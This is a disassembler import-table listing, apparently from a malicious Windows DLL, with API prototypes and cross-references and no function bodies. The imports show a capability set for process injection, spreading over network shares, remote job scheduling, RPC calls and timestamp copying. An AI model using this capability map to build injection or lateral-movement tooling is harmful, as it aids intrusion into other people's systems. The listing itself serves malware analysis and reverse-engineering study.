extrn DeleteFileA:dword ; CODE XREF: sub_9A7670+3E�p
; sub_9A7FAE+119�p ...
; BOOL __stdcall LockFile(HANDLE hFile, DWORD dwFileOffsetLow, DWORD dwFileOffsetHigh, DWORD nNumberOfBytesToLockLow, DWORD nNumberOfBytesToLockHigh)
extrn LockFile:dword ; CODE XREF: StartAddress+117�p
; DATA XREF: StartAddress+117�r
; DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh)
extrn GetFileSize:dword ; CODE XREF: StartAddress+10D�p
; sub_9AB76E+2D�p
; DATA XREF: ...
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: StartAddress+EB�p
; StartAddress+FF�p ...
; UINT __stdcall SetErrorMode(UINT uMode)
extrn SetErrorMode:dword ; CODE XREF: StartAddress+F�p
; DATA XREF: StartAddress+F�r
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: sub_9A799E+206�p
; sub_9A89E8+10�p ...
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: sub_9A799E+196�p
; DATA XREF: sub_9A799E+196�r
; HANDLE __stdcall OpenMutexA(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCSTR lpName)
extrn OpenMutexA:dword ; CODE XREF: sub_9A799E+15B�p
; DATA XREF: sub_9A799E+15B�r
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: sub_9A799E+F9�p
; DATA XREF: sub_9A799E+F9�r
; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCSTR lpName)
extrn CreateMutexA:dword ; CODE XREF: sub_9A799E+E5�p
; DllMain(x,x,x)+5D�p
; DATA XREF: ...
; BOOL __stdcall GetComputerNameA(LPSTR lpBuffer, LPDWORD nSize)
extrn GetComputerNameA:dword ; CODE XREF: sub_9A799E+69�p
; sub_9A9072+48�p
; DATA XREF: ...
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: sub_9A799E+3C�p
; sub_9AB6A9+24�p ...
; DWORD __stdcall GetCurrentProcessId()
extrn GetCurrentProcessId:dword ; CODE XREF: DllMain(x,x,x)+2C�p
; sub_9AA082+17�p ...
; BOOL __stdcall DisableThreadLibraryCalls(HMODULE hLibModule)
extrn DisableThreadLibraryCalls:dword ; CODE XREF: DllMain(x,x,x)+22�p
; DATA XREF: DllMain(x,x,x)+22�r
; BOOL __stdcall DeviceIoControl(HANDLE hDevice, DWORD dwIoControlCode, LPVOID lpInBuffer, DWORD nInBufferSize, LPVOID lpOutBuffer, DWORD nOutBufferSize, LPDWORD lpBytesReturned, LPOVERLAPPED lpOverlapped)
extrn DeviceIoControl:dword ; CODE XREF: sub_9A7FAE+14F�p
; DATA XREF: sub_9A7FAE+14F�r
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: sub_9A7FAE+DE�p
; sub_9A8326+1B5�p ...
; UINT __stdcall GetTempFileNameA(LPCSTR lpPathName, LPCSTR lpPrefixString, UINT uUnique, LPSTR lpTempFileName)
extrn GetTempFileNameA:dword ; CODE XREF: sub_9A7FAE+5E�p
; sub_9A7FAE+8C�p ...
; BOOL __stdcall DeleteFileW(LPCWSTR lpFileName)
extrn DeleteFileW:dword ; CODE XREF: sub_9A8326+2C8�p
; DATA XREF: sub_9A8326+2C8�r
; void __stdcall GetLocalTime(LPSYSTEMTIME lpSystemTime)
extrn GetLocalTime:dword ; CODE XREF: sub_9A8326+267�p
; DATA XREF: sub_9A8326+267�r
; HANDLE __stdcall CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn CreateFileW:dword ; CODE XREF: sub_9A8326+17A�p
; DATA XREF: sub_9A8326+17A�r
; BOOL __stdcall FindClose(HANDLE hFindFile)
extrn FindClose:dword ; CODE XREF: sub_9A8326+14C�p
; sub_9AABA4+1F7�p ...
; HANDLE __stdcall FindFirstFileW(LPCWSTR lpFileName, LPWIN32_FIND_DATAW lpFindFileData)
extrn FindFirstFileW:dword ; CODE XREF: sub_9A8326+140�p
; DATA XREF: sub_9A8326+140�r
; int __stdcall MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: sub_9A870C+13A�p
; sub_9A9E95+34�p ...
; BOOL __stdcall GetComputerNameW(LPWSTR lpBuffer, LPDWORD nSize)
extrn GetComputerNameW:dword ; CODE XREF: sub_9A8949+5A�p
; DATA XREF: sub_9A8949+5A�r
; BOOL __stdcall TerminateThread(HANDLE hThread, DWORD dwExitCode)
extrn TerminateThread:dword ; CODE XREF: sub_9A8A72+149�p
; sub_9A8CAF+74�p ...
; DWORD __stdcall GetCurrentThreadId()
extrn GetCurrentThreadId:dword ; CODE XREF: sub_9A8A72+120�p
; sub_9AB510+7�p
; DATA XREF: ...
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: sub_9A8CAF+65�p
; sub_9AC5BB+5C�p ...
; void __stdcall SetLastError(DWORD dwErrCode)
extrn SetLastError:dword ; CODE XREF: sub_9A9D72+26�p
; sub_9A9E5D+29�p ...
; BOOL __stdcall Module32Next(HANDLE hSnapshot, LPMODULEENTRY32 lpme)
extrn __imp_Module32Next:dword ; DATA XREF: Module32Next�r
; BOOL __stdcall Module32First(HANDLE hSnapshot, LPMODULEENTRY32 lpme)
extrn __imp_Module32First:dword ; DATA XREF: Module32First�r
; HANDLE __stdcall CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID)
extrn __imp_CreateToolhelp32Snapshot:dword
; DATA XREF: CreateToolhelp32Snapshot�r
; BOOL __stdcall SetThreadPriority(HANDLE hThread, int nPriority)
extrn SetThreadPriority:dword ; CODE XREF: sub_9AA2CE+ED�p
; sub_9AA2CE+106�p ...
; BOOL __stdcall VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect)
extrn VirtualProtect:dword ; CODE XREF: sub_9AA2CE+CF�p
; sub_9AA2CE+114�p
; DATA XREF: ...
; int __stdcall GetThreadPriority(HANDLE hThread)
extrn GetThreadPriority:dword ; CODE XREF: sub_9AA2CE+1F�p
; DATA XREF: sub_9AA2CE+1F�r
; HANDLE __stdcall GetCurrentThread()
extrn GetCurrentThread:dword ; CODE XREF: sub_9AA2CE+15�p
; DATA XREF: sub_9AA2CE+15�r
; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
extrn VirtualFree:dword ; CODE XREF: sub_9AA40D+69�p
; DATA XREF: sub_9AA40D+69�r
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: sub_9AA40D+3C�p
; DATA XREF: sub_9AA40D+3C�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_9AA40D+25�p
; sub_9ABCA4+68�p ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_9AA40D+16�p
; sub_9AD00D+11�p
; DATA XREF: ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_9AA40D+9�p
; sub_9AA53A+5�p ...
; BOOL __stdcall CreateDirectoryA(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes)
extrn CreateDirectoryA:dword ; CODE XREF: sub_9AABA4+250�p
; sub_9AABA4+2AF�p
; DATA XREF: ...
; HANDLE __stdcall FindFirstFileA(LPCSTR lpFileName, LPWIN32_FIND_DATAA lpFindFileData)
extrn FindFirstFileA:dword ; CODE XREF: sub_9AABA4+1E8�p
; sub_9AABA4+369�p
; DATA XREF: ...
; BOOL __stdcall GetVolumeInformationA(LPCSTR lpRootPathName, LPSTR lpVolumeNameBuffer, DWORD nVolumeNameSize, LPDWORD lpVolumeSerialNumber, LPDWORD lpMaximumComponentLength, LPDWORD lpFileSystemFlags, LPSTR lpFileSystemNameBuffer, DWORD nFileSystemNameSize)
extrn GetVolumeInformationA:dword ; CODE XREF: sub_9AABA4+32�p
; sub_9AB343+3B�p
; DATA XREF: ...
; UINT __stdcall GetDriveTypeA(LPCSTR lpRootPathName)
extrn GetDriveTypeA:dword ; CODE XREF: sub_9AAFD8+47�p
; sub_9AB156+48�p
; DATA XREF: ...
; DWORD __stdcall GetLogicalDrives()
extrn GetLogicalDrives:dword ; CODE XREF: sub_9AB156+17�p
; DATA XREF: sub_9AB156+17�r
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: sub_9AB510:loc_9AB53F�p
; sub_9AC476+4F�p ...
; BOOL __stdcall QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount)
extrn QueryPerformanceCounter:dword ; CODE XREF: sub_9AB510+1B�p
; DATA XREF: sub_9AB510+1B�r
; BOOL __stdcall SetFileTime(HANDLE hFile, const FILETIME *lpCreationTime, const FILETIME *lpLastAccessTime, const FILETIME *lpLastWriteTime)
extrn SetFileTime:dword ; CODE XREF: sub_9AB6A9+8F�p
; DATA XREF: sub_9AB6A9+8F�r
; BOOL __stdcall GetFileTime(HANDLE hFile, LPFILETIME lpCreationTime, LPFILETIME lpLastAccessTime, LPFILETIME lpLastWriteTime)
extrn GetFileTime:dword ; CODE XREF: sub_9AB6A9+5B�p
; DATA XREF: sub_9AB6A9+5B�r
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_9AB746+D�p
; DATA XREF: sub_9AB746+D�r
; HANDLE __stdcall GetProcessHeap()
extrn GetProcessHeap:dword ; CODE XREF: sub_9AB746+6�p
; sub_9AB75A+6�p
; DATA XREF: ...
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: sub_9AB75A+D�p
; DATA XREF: sub_9AB75A+D�r
; BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped)
extrn ReadFile:dword ; CODE XREF: sub_9AB76E+51�p
; DATA XREF: sub_9AB76E+51�r
; BOOL __stdcall Process32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe)
extrn __imp_Process32Next:dword ; DATA XREF: Process32Next�r
; BOOL __stdcall Process32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe)
extrn __imp_Process32First:dword ; DATA XREF: Process32First�r
; BOOL __stdcall Thread32Next(HANDLE hSnapshot, LPTHREADENTRY32 lpte)
extrn __imp_Thread32Next:dword ; DATA XREF: Thread32Next�r
; HANDLE __stdcall OpenThread(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwThreadId)
extrn OpenThread:dword ; CODE XREF: sub_9ABCA4+123�p
; DATA XREF: sub_9ABCA4+123�r
; BOOL __stdcall Thread32First(HANDLE hSnapshot, LPTHREADENTRY32 lpte)
extrn __imp_Thread32First:dword ; DATA XREF: Thread32First�r
; HANDLE __stdcall CreateRemoteThread(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn CreateRemoteThread:dword ; CODE XREF: sub_9ABCA4+9C�p
; DATA XREF: sub_9ABCA4+9C�r
; BOOL __stdcall WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
extrn WriteProcessMemory:dword ; CODE XREF: sub_9ABCA4+7C�p
; DATA XREF: sub_9ABCA4+7C�r
; LPVOID __stdcall VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAllocEx:dword ; CODE XREF: sub_9ABCA4+3D�p
; DATA XREF: sub_9ABCA4+3D�r
; HANDLE __stdcall OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId)
extrn OpenProcess:dword ; CODE XREF: sub_9ABCA4+1F�p
; sub_9ABECA+35�p ...
; BOOL __stdcall ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead)
extrn ReadProcessMemory:dword ; CODE XREF: sub_9ABE40+27�p
; sub_9ABE40+40�p ...
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName, DWORD dwFileAttributes)
extrn SetFileAttributesA:dword ; CODE XREF: sub_9AC132+2A�p
; DATA XREF: sub_9AC132+2A�r
; DWORD __stdcall GetFileAttributesA(LPCSTR lpFileName)
extrn GetFileAttributesA:dword ; CODE XREF: sub_9AC132+4�p
; DATA XREF: sub_9AC132+4�r
; DWORD __stdcall GetCurrentDirectoryA(DWORD nBufferLength, LPSTR lpBuffer)
extrn GetCurrentDirectoryA:dword ; CODE XREF: sub_9AC27E+2A�p
; DATA XREF: sub_9AC27E+2A�r
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: sub_9AC2CA+4E�p
; DATA XREF: sub_9AC2CA+4E�r
; LONG __stdcall InterlockedDecrement(volatile LONG *lpAddend)
extrn InterlockedDecrement:dword ; CODE XREF: sub_9AC5BB+133�p
; sub_9AC789+115�p ...
; LONG __stdcall InterlockedIncrement(volatile LONG *lpAddend)
extrn InterlockedIncrement:dword ; CODE XREF: sub_9AC5BB+14�p
; sub_9AC789+17�p ...
; LONG __stdcall InterlockedExchange(volatile LONG *Target, LONG Value)
extrn InterlockedExchange:dword ; CODE XREF: sub_9AC6FE+41�p
; sub_9ACA50+4B�p ...
; HANDLE __stdcall CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName)
extrn CreateEventA:dword ; CODE XREF: sub_9AC911+BE�p
; sub_9ACABE+B8�p ...
; BOOL __stdcall SetEvent(HANDLE hEvent)
extrn SetEvent:dword ; CODE XREF: sub_9ACABE+45D�p
; sub_9ACABE+4D7�p
; DATA XREF: ...
; HANDLE __stdcall OpenEventA(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCSTR lpName)
extrn OpenEventA:dword ; CODE XREF: sub_9ACABE+454�p
; sub_9ACABE+4CE�p
; DATA XREF: ...
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
extrn GetSystemTime:dword ; CODE XREF: sub_9ADB52+6F�p
; sub_9ADD9B+2A�p
; DATA XREF: ...
;
; Imports from mpr.dll
;
; DWORD __stdcall WNetAddConnection2W(LPNETRESOURCEW lpNetResource, LPCWSTR lpPassword, LPCWSTR lpUserName, DWORD dwFlags)
extrn __imp_WNetAddConnection2W:dword ; DATA XREF: WNetAddConnection2W�r
; DWORD __stdcall WNetAddConnection2A(LPNETRESOURCEA lpNetResource, LPCSTR lpPassword, LPCSTR lpUserName, DWORD dwFlags)
extrn __imp_WNetAddConnection2A:dword ; DATA XREF: WNetAddConnection2A�r
; DWORD __stdcall WNetCancelConnection2A(LPCSTR lpName, DWORD dwFlags, BOOL fForce)
extrn __imp_WNetCancelConnection2A:dword
; DATA XREF: WNetCancelConnection2A�r
; DWORD __stdcall WNetCancelConnection2W(LPCWSTR lpName, DWORD dwFlags, BOOL fForce)
extrn __imp_WNetCancelConnection2W:dword
; DATA XREF: WNetCancelConnection2W�r
;
; Imports from msvcrt.dll
;
; int __cdecl stricmp(const char *Str1, const char *Str2)
extrn _stricmp:dword ; CODE XREF: sub_9A722A+85�p
; sub_9A9199+9A�p ...
extrn __imp__initterm:dword ; DATA XREF: _initterm�r
extrn _adjust_fdiv:dword ; DATA XREF: _CRT_INIT(x,x,x):loc_9B7137�r
; void *__cdecl calloc(size_t NumOfElements, size_t SizeOfElements)
extrn calloc:dword ; CODE XREF: sub_9B542A+45�p
; sub_9B5561+31�p ...
; int sscanf(const char *Src, const char *Format, ...)
extrn sscanf:dword ; CODE XREF: sub_9B5214+DB�p
; sub_9B5214+125�p ...
; void *__cdecl memmove(void *Dst, const void *Src, size_t Size)
extrn memmove:dword ; CODE XREF: sub_9AF2B0+34�p
; sub_9B2A35+2A�p
; DATA XREF: ...
; void *__cdecl bsearch(const void *Key, const void *Base, size_t NumOfElements, size_t SizeOfElements, int (__cdecl *PtFuncCompare)(const void *, const void *))
extrn bsearch:dword ; CODE XREF: sub_9AEEBC+34�p
; sub_9AEEBC+5F�p ...
; __int32 __cdecl labs(__int32 X)
extrn __imp_labs:dword ; DATA XREF: labs�r
extrn __imp_sin:dword ; DATA XREF: sin�r
extrn __imp_log:dword ; DATA XREF: log�r
; char *__cdecl strtok(char *Str, const char *Delim)
extrn strtok:dword ; CODE XREF: sub_9ADA6E+41�p
; sub_9ADA6E+4F�p ...
; int __cdecl atoi(const char *Str)
extrn atoi:dword ; CODE XREF: sub_9ADA6E+5F�p
; sub_9ADA6E+C0�p
; DATA XREF: ...
; wchar_t *__cdecl wcsdup(const wchar_t *Str)
extrn _wcsdup:dword ; CODE XREF: sub_9A85FC+86�p
; sub_9AD062+16D�p ...
; int printf(const char *Format, ...)
extrn printf:dword ; CODE XREF: sub_9ABCA4+14D�p
; DATA XREF: sub_9ABCA4+14D�r
; char *__cdecl strcpy(char *Dest, const char *Source)
extrn __imp_strcpy:dword ; DATA XREF: strcpy�r
; char *__cdecl strchr(const char *Str, int Val)
extrn strchr:dword ; CODE XREF: sub_9AA85A+12C�p
; sub_9B410C+54�p ...
; int __cdecl strcmp(const char *Str1, const char *Str2)
extrn __imp_strcmp:dword ; DATA XREF: strcmp�r
; char *__cdecl strcat(char *Dest, const char *Source)
extrn __imp_strcat:dword ; DATA XREF: strcat�r
; wchar_t *__cdecl wcsstr(const wchar_t *Str, const wchar_t *SubStr)
extrn wcsstr:dword ; CODE XREF: sub_9A9D17+25�p
; DATA XREF: sub_9A9D17+25�r
; void *__cdecl memcpy(void *Dst, const void *Src, size_t Size)
extrn __imp_memcpy:dword ; DATA XREF: memcpy�r
; char *__cdecl strlwr(char *Str)
extrn _strlwr:dword ; CODE XREF: sub_9A9471+6D�p
; sub_9AE3FA+182�p ...
; char *__cdecl strstr(const char *Str, const char *SubStr)
extrn strstr:dword ; CODE XREF: sub_9A9471+84�p
; sub_9AE3FA+196�p ...
; char *__cdecl strdup(const char *Src)
extrn _strdup:dword ; CODE XREF: sub_9A90FF+26�p
; sub_9AA85A+120�p ...
; wchar_t *__cdecl wcsncpy(wchar_t *Dest, const wchar_t *Source, size_t Count)
extrn wcsncpy:dword ; CODE XREF: sub_9A8949+37�p
; DATA XREF: sub_9A8949+37�r
; size_t __cdecl wcslen(const wchar_t *Str)
extrn wcslen:dword ; CODE XREF: sub_9A870C+81�p
; sub_9A870C+8E�p ...
; void *__cdecl malloc(size_t Size)
extrn malloc:dword ; CODE XREF: sub_9A870C+98�p
; sub_9A9638+4�p ...
; void __cdecl free(void *Memory)
extrn free:dword ; CODE XREF: sub_9A870C+10F�p
; sub_9A870C+165�p ...
; void *__cdecl realloc(void *Memory, size_t NewSize)
extrn realloc:dword ; CODE XREF: sub_9A85FC+56�p
; sub_9B132C+18�p ...
; wchar_t *__cdecl wcscat(wchar_t *Dest, const wchar_t *Source)
extrn wcscat:dword ; CODE XREF: sub_9A8326+95�p
; sub_9A8326+E2�p ...
; wchar_t *__cdecl wcscpy(wchar_t *Dest, const wchar_t *Source)
extrn wcscpy:dword ; CODE XREF: sub_9A8326+9F�p
; sub_9A870C+A9�p ...
; int __cdecl wcscmp(const wchar_t *Str1, const wchar_t *Str2)
extrn wcscmp:dword ; CODE XREF: sub_9A8326+C8�p
; sub_9A88A6+65�p
; DATA XREF: ...
; void *__cdecl memset(void *Dst, int Val, size_t Size)
extrn __imp_memset:dword ; DATA XREF: memset�r
; int snwprintf(wchar_t *Dest, size_t Count, const wchar_t *Format, ...)
extrn _snwprintf:dword ; CODE XREF: sub_9A827D+1D�p
; sub_9A82BC+20�p ...
; int __cdecl memcmp(const void *Buf1, const void *Buf2, size_t Size)
extrn __imp_memcmp:dword ; DATA XREF: memcmp�r
; char *__cdecl strncat(char *Dest, const char *Source, size_t Count)
extrn strncat:dword ; CODE XREF: sub_9A7670+B4�p
; sub_9A7E5A+33�p
; DATA XREF: ...
; void __cdecl srand(unsigned int Seed)
extrn srand:dword ; CODE XREF: sub_9A752A+17�p
; sub_9A799E+93�p ...
; int __cdecl rand()
extrn rand:dword ; CODE XREF: sub_9A752A+1D�p
; sub_9A7670+91�p ...
; int snprintf(char *Dest, size_t Count, const char *Format, ...)
extrn _snprintf:dword ; CODE XREF: sub_9A752A+54�p
; sub_9A799E+CD�p ...
; char *__cdecl strncpy(char *Dest, const char *Source, size_t Count)
extrn strncpy:dword ; CODE XREF: sub_9A752A+118�p
; sub_9A9471+25�p ...
; char *__cdecl strrchr(const char *Str, int Ch)
extrn strrchr:dword ; CODE XREF: sub_9A7410+61�p
; sub_9A8D37+C�p ...
; int __cdecl strnicmp(const char *Str1, const char *Str, size_t MaxCount)
extrn _strnicmp:dword ; CODE XREF: sub_9A722A+5A�p
; sub_9A8D37+5C�p ...
; size_t __cdecl strlen(const char *Str)
extrn __imp_strlen:dword ; DATA XREF: strlen�r
; int __cdecl memicmp(const void *Buf1, const void *Buf2, size_t Size)
extrn _memicmp:dword ; CODE XREF: sub_9B488E+50�p
; sub_9B488E+74�p
; DATA XREF: ...
;
; Imports from netapi32.dll
;
; DWORD __stdcall NetApiBufferFree(LPVOID Buffer)
extrn __imp_NetApiBufferFree:dword ; DATA XREF: NetApiBufferFree�r
; DWORD __stdcall NetScheduleJobDel(LPCWSTR Servername, DWORD MinJobId, DWORD MaxJobId)
extrn __imp_NetScheduleJobDel:dword ; DATA XREF: NetScheduleJobDel�r
; DWORD __stdcall NetScheduleJobEnum(LPCWSTR Servername, LPBYTE *PointerToBuffer, DWORD PrefferedMaximumLength, LPDWORD EntriesRead, LPDWORD TotalEntries, LPDWORD ResumeHandle)
extrn __imp_NetScheduleJobEnum:dword ; DATA XREF: NetScheduleJobEnum�r
; DWORD __stdcall NetScheduleJobAdd(LPCWSTR Servername, LPBYTE Buffer, LPDWORD JobId)
extrn __imp_NetScheduleJobAdd:dword ; DATA XREF: NetScheduleJobAdd�r
; DWORD __stdcall NetUserEnum(LPCWSTR servername, DWORD level, DWORD filter, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resume_handle)
extrn __imp_NetUserEnum:dword ; DATA XREF: NetUserEnum�r
; DWORD __stdcall NetServerEnum(LPCWSTR servername, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, DWORD servertype, LPCWSTR domain, LPDWORD resume_handle)
extrn __imp_NetServerEnum:dword ; DATA XREF: NetServerEnum�r
; DWORD __stdcall NetWkstaGetInfo(LPWSTR servername, DWORD level, LPBYTE *bufptr)
extrn __imp_NetWkstaGetInfo:dword ; DATA XREF: NetWkstaGetInfo�r
;
; Imports from oleaut32.dll
;
; HRESULT __stdcall VariantClear(VARIANTARG *pvarg)
extrn VariantClear:dword ; CODE XREF: sub_9A8A72+175�p
; DATA XREF: sub_9A8A72+175�r
; void __stdcall VariantInit(VARIANTARG *pvarg)
extrn VariantInit:dword ; CODE XREF: sub_9A8A72+5C�p
; DATA XREF: sub_9A8A72+5C�r
; void __stdcall SysFreeString(BSTR bstrString)
extrn SysFreeString:dword ; CODE XREF: sub_9A8EDE+E8�p
; DATA XREF: sub_9A8EDE+E8�r
; UINT __stdcall SysStringLen(BSTR)
extrn SysStringLen:dword ; CODE XREF: sub_9A8EDE+B3�p
; DATA XREF: sub_9A8EDE+B3�r
; BSTR __stdcall SysAllocString(const OLECHAR *psz)
extrn SysAllocString:dword ; CODE XREF: sub_9A8EDE+AA�p
; DATA XREF: sub_9A8EDE+AA�r
;
; Imports from rpcrt4.dll
;
; RPC_STATUS __stdcall RpcBindingFromStringBindingA(RPC_CSTR StringBinding, RPC_BINDING_HANDLE *Binding)
extrn RpcBindingFromStringBindingA:dword ; CODE XREF: sub_9A97A7+37�p
; sub_9A983B+3A�p
; DATA XREF: ...
; RPC_STATUS __stdcall RpcStringBindingComposeA(RPC_CSTR ObjUuid, RPC_CSTR ProtSeq, RPC_CSTR NetworkAddr, RPC_CSTR Endpoint, RPC_CSTR Options, RPC_CSTR *StringBinding)
extrn RpcStringBindingComposeA:dword ; CODE XREF: sub_9A97A7+25�p
; sub_9A983B+28�p
; DATA XREF: ...
; CLIENT_CALL_RETURN NdrClientCall2(PMIDL_STUB_DESC pStubDescriptor, PFORMAT_STRING pFormat, ...)
extrn __imp_NdrClientCall2:dword ; DATA XREF: NdrClientCall2�r
; RPC_STATUS __stdcall RpcBindingFree(RPC_BINDING_HANDLE *Binding)
extrn RpcBindingFree:dword ; CODE XREF: sub_9A97A7+85�p
; sub_9A983B+AD�p
; DATA XREF: ...
;
; Imports from shell32.dll
;
; void __stdcall SHGetSetSettings(LPSHELLSTATEA lpss, DWORD dwMask, BOOL bSet)
extrn SHGetSetSettings:dword ; CODE XREF: sub_9AB1F2+3D�p
; DATA XREF: sub_9AB1F2+3D�r
; BOOL __stdcall SHGetSpecialFolderPathA(HWND hwnd, LPSTR pszPath, int csidl, BOOL fCreate)
extrn SHGetSpecialFolderPathA:dword ; CODE XREF: sub_9A7670+8F�p
; sub_9A7670+DE�p
; DATA XREF: ...
;
; Imports from shlwapi.dll
;
; LSTATUS __stdcall SHDeleteKeyA(HKEY hkey, LPCSTR pszSubKey)
extrn SHDeleteKeyA:dword ; CODE XREF: StartAddress+14C�p
; DATA XREF: StartAddress+14C�r
; LSTATUS __stdcall SHDeleteValueA(HKEY hkey, LPCSTR pszSubKey, LPCSTR pszValue)
extrn SHDeleteValueA:dword ; CODE XREF: StartAddress+181�p
; DATA XREF: StartAddress+181�r
; LPWSTR __stdcall StrStrIW(LPCWSTR lpFirst, LPCWSTR lpSrch)
extrn StrStrIW:dword ; CODE XREF: sub_9ABF43+87�p
; DATA XREF: sub_9ABF43+87�r
; LPSTR __stdcall StrStrIA(LPCSTR lpFirst, LPCSTR lpSrch)
extrn StrStrIA:dword ; CODE XREF: sub_9A7410+83�p
; sub_9A7410+95�p ...
;
; Imports from user32.dll
;
; BOOL __stdcall GetLastInputInfo(PLASTINPUTINFO plii)
extrn GetLastInputInfo:dword ; CODE XREF: sub_9ACA50+2A�p
; DATA XREF: sub_9ACA50+2A�r
; BOOL __stdcall PostMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn PostMessageA:dword ; CODE XREF: fn+1A�p
; DATA XREF: fn+1A�r
; HWND __stdcall GetDlgItem(HWND hDlg, int nIDDlgItem)
extrn GetDlgItem:dword ; CODE XREF: fn+6�p
; DATA XREF: fn+6�r
; BOOL __stdcall EnumThreadWindows(DWORD dwThreadId, WNDENUMPROC lpfn, LPARAM lParam)
extrn EnumThreadWindows:dword ; CODE XREF: sub_9A8A37+1E�p
; DATA XREF: sub_9A8A37+1E�r
; LRESULT __stdcall DefWindowProcA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn DefWindowProcA:dword ; DATA XREF: sub_9AB07D+20�r
; LRESULT __stdcall DispatchMessageA(const MSG *lpMsg)
extrn DispatchMessageA:dword ; CODE XREF: sub_9AB0A3+98�p
; DATA XREF: sub_9AB0A3+98�r
; ATOM __stdcall RegisterClassA(const WNDCLASSA *lpWndClass)
extrn RegisterClassA:dword ; CODE XREF: sub_9AB0A3+52�p
; DATA XREF: sub_9AB0A3+52�r
; HWND __stdcall CreateWindowExA(DWORD dwExStyle, LPCSTR lpClassName, LPCSTR lpWindowName, DWORD dwStyle, int X, int Y, int nWidth, int nHeight, HWND hWndParent, HMENU hMenu, HINSTANCE hInstance, LPVOID lpParam)
extrn CreateWindowExA:dword ; CODE XREF: sub_9AB0A3+72�p
; DATA XREF: sub_9AB0A3+72�r
